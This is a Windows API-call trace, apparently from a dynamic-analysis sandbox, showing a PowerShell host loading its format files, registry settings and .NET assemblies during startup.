	[0653.093] ReadFile (in: hFile=0x314, lpBuffer=0x3437a12, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3437a12*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0653.093] ReadFile (in: hFile=0x314, lpBuffer=0x34382f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x34382f8*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0653.093] CloseHandle (hObject=0x314) returned 1
	[0653.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0653.093] SetErrorMode (uMode=0x1) returned 0x1
	[0653.096] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d2e0 | out: lpFileInformation=0x16d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1
	[0653.096] SetErrorMode (uMode=0x1) returned 0x1
	[0653.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0653.097] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x314) returned 0x0
	[0653.097] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0653.097] CoTaskMemAlloc (cb=0x5a) returned 0x2edbc0
	[0653.097] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2edbc0, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0653.097] CoTaskMemFree (pv=0x2edbc0) 
	[0653.097] RegCloseKey (hKey=0x314) returned 0x0
	[0653.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0653.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e
	[0653.100] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x97ff577c, Data2=0x87af, Data3=0x44ca, Data4=([0]=0x80, [1]=0x88, [2]=0x58, [3]=0xb1, [4]=0x54, [5]=0xaf, [6]=0x4d, [7]=0xe6))) returned 0x0
	[0653.102] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x505ef280, Data2=0xaf3, Data3=0x4a3a, Data4=([0]=0x99, [1]=0xbc, [2]=0xd6, [3]=0x71, [4]=0x76, [5]=0x57, [6]=0x6f, [7]=0xb4))) returned 0x0
	[0653.103] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x3f032503, Data2=0xc15b, Data3=0x4c13, Data4=([0]=0xad, [1]=0x5, [2]=0x70, [3]=0x8f, [4]=0x5, [5]=0xf6, [6]=0x3b, [7]=0x76))) returned 0x0
	[0653.104] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x7249a0d5, Data2=0x83fb, Data3=0x4d39, Data4=([0]=0x97, [1]=0xba, [2]=0xb1, [3]=0x62, [4]=0x68, [5]=0x98, [6]=0x26, [7]=0x38))) returned 0x0
	[0653.105] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xf764b9e2, Data2=0xc7d5, Data3=0x4f06, Data4=([0]=0xba, [1]=0x8a, [2]=0xa6, [3]=0x0, [4]=0xe0, [5]=0xed, [6]=0xde, [7]=0x48))) returned 0x0
	[0653.105] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x2c311ba7, Data2=0x7388, Data3=0x4f30, Data4=([0]=0xbe, [1]=0x53, [2]=0xf3, [3]=0xbf, [4]=0x29, [5]=0x2f, [6]=0x14, [7]=0x40))) returned 0x0
	[0653.106] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0653.106] SetErrorMode (uMode=0x1) returned 0x1
	[0653.107] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x314
	[0653.107] GetFileType (hFile=0x314) returned 0x1
	[0653.107] SetErrorMode (uMode=0x1) returned 0x1
	[0653.107] GetFileType (hFile=0x314) returned 0x1
	[0653.107] ReadFile (in: hFile=0x314, lpBuffer=0x3484058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3484058*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.109] ReadFile (in: hFile=0x314, lpBuffer=0x3484058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3484058*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.109] ReadFile (in: hFile=0x314, lpBuffer=0x3484058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3484058*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.110] ReadFile (in: hFile=0x314, lpBuffer=0x3484058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3484058*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.111] ReadFile (in: hFile=0x314, lpBuffer=0x3484058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3484058*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.111] ReadFile (in: hFile=0x314, lpBuffer=0x3484058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3484058*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0653.111] ReadFile (in: hFile=0x314, lpBuffer=0x3484058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3484058*, lpNumberOfBytesRead=0x16d338*=0xaca, lpOverlapped=0x0) returned 1
	[0653.112] ReadFile (in: hFile=0x314, lpBuffer=0x348368a, nNumberOfBytesToRead=0x136, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x348368a*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0653.112] ReadFile (in: hFile=0x314, lpBuffer=0x3484058, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x3484058*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0653.112] CloseHandle (hObject=0x314) returned 1
	[0653.112] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0653.112] SetErrorMode (uMode=0x1) returned 0x1
	[0653.112] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x16d2e0 | out: lpFileInformation=0x16d2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1
	[0653.113] SetErrorMode (uMode=0x1) returned 0x1
	[0653.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0653.113] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x16d3c8 | out: phkResult=0x16d3c8*=0x314) returned 0x0
	[0653.113] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d34c, lpData=0x0, lpcbData=0x16d348*=0x0 | out: lpType=0x16d34c*=0x1, lpData=0x0, lpcbData=0x16d348*=0x56) returned 0x0
	[0653.113] CoTaskMemAlloc (cb=0x5a) returned 0x2edbc0
	[0653.113] RegQueryValueExW (in: hKey=0x314, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x16d31c, lpData=0x2edbc0, lpcbData=0x16d318*=0x56 | out: lpType=0x16d31c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x16d318*=0x56) returned 0x0
	[0653.113] CoTaskMemFree (pv=0x2edbc0) 
	[0653.113] RegCloseKey (hKey=0x314) returned 0x0
	[0653.113] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0653.114] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16cec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0653.119] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0653.122] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0654.663] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0654.677] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0654.681] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0654.683] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Core\\3.5.0.0__b77a5c561934e089\\System.Core.dll", lpFilePart=0x0) returned 0x52
	[0654.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Configuration.Install\\2.0.0.0__b03f5f7f11d50a3a\\System.Configuration.Install.dll", lpFilePart=0x0) returned 0x74
	[0654.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0654.688] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_64\\System.Transactions\\2.0.0.0__b77a5c561934e089\\System.Transactions.dll", lpFilePart=0x0) returned 0x60
	[0654.691] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0654.693] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0654.695] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0654.697] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", nBufferLength=0x105, lpBuffer=0x16c850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Xml\\2.0.0.0__b77a5c561934e089\\System.Xml.dll", lpFilePart=0x0) returned 0x50
	[0658.228] VirtualQuery (in: lpAddress=0x16be60, lpBuffer=0x16cd20, dwLength=0x30 | out: lpBuffer=0x16cd20*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0658.229] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x55a2de8, Data2=0xbcf0, Data3=0x4646, Data4=([0]=0xba, [1]=0x5a, [2]=0xc7, [3]=0x3d, [4]=0x62, [5]=0xd3, [6]=0x39, [7]=0x6))) returned 0x0
	[0658.231] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x369382b5, Data2=0xcc28, Data3=0x4451, Data4=([0]=0x9c, [1]=0xd2, [2]=0x59, [3]=0x2f, [4]=0xd8, [5]=0xb2, [6]=0x4b, [7]=0x3f))) returned 0x0
	[0658.231] VirtualQuery (in: lpAddress=0x16c010, lpBuffer=0x16ced0, dwLength=0x30 | out: lpBuffer=0x16ced0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0658.232] VirtualQuery (in: lpAddress=0x16c010, lpBuffer=0x16ced0, dwLength=0x30 | out: lpBuffer=0x16ced0*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0658.233] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x337fa405, Data2=0xb3e1, Data3=0x4dc2, Data4=([0]=0x9d, [1]=0x9c, [2]=0x5, [3]=0x67, [4]=0x93, [5]=0x53, [6]=0xb0, [7]=0xf4))) returned 0x0
	[0658.236] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x840880a8, Data2=0xad3b, Data3=0x4ffe, Data4=([0]=0x82, [1]=0x81, [2]=0x76, [3]=0x62, [4]=0xf4, [5]=0xe4, [6]=0x1b, [7]=0x43))) returned 0x0
	[0658.237] VirtualQuery (in: lpAddress=0x16c260, lpBuffer=0x16d120, dwLength=0x30 | out: lpBuffer=0x16d120*(BaseAddress=0x16c000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0658.237] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x37be8ad9, Data2=0xf225, Data3=0x40a9, Data4=([0]=0xb2, [1]=0x24, [2]=0x5e, [3]=0x57, [4]=0x9b, [5]=0x61, [6]=0x99, [7]=0x8))) returned 0x0
	[0658.237] VirtualQuery (in: lpAddress=0x16b8d0, lpBuffer=0x16c790, dwLength=0x30 | out: lpBuffer=0x16c790*(BaseAddress=0x16b000, AllocationBase=0xf0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0658.238] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0x6e33c8c1, Data2=0x312, Data3=0x4702, Data4=([0]=0x84, [1]=0x8, [2]=0xab, [3]=0xe0, [4]=0x29, [5]=0x2a, [6]=0x79, [7]=0x4a))) returned 0x0
	[0658.238] CoCreateGuid (in: pguid=0x16d5f0 | out: pguid=0x16d5f0*(Data1=0xb0daf0b8, Data2=0xfcca, Data3=0x489f, Data4=([0]=0x90, [1]=0xfb, [2]=0x89, [3]=0x9a, [4]=0x9b, [5]=0x0, [6]=0xd5, [7]=0xcb))) returned 0x0
	[0658.238] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0658.238] GetFileType (hFile=0x2fc) returned 0x1
	[0658.238] SetErrorMode (uMode=0x1) returned 0x1
	[0658.238] GetFileType (hFile=0x2fc) returned 0x1
	[0658.238] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.239] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.239] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.240] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.241] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.243] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.243] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.244] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.244] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.244] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.245] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.245] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.245] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.248] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x1000, lpOverlapped=0x0) returned 1
	[0658.248] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0xbce, lpOverlapped=0x0) returned 1
	[0658.249] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e08a26, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e08a26*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0658.249] ReadFile (in: hFile=0x2fc, lpBuffer=0x2e092f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x16d338, lpOverlapped=0x0 | out: lpBuffer=0x2e092f0*, lpNumberOfBytesRead=0x16d338*=0x0, lpOverlapped=0x0) returned 1
	[0658.249] CloseHandle (hObject=0x2fc) returned 1
	[0658.249] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x16d080, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0658.249] SetErrorMode (uMode=0x1) returned 0x1
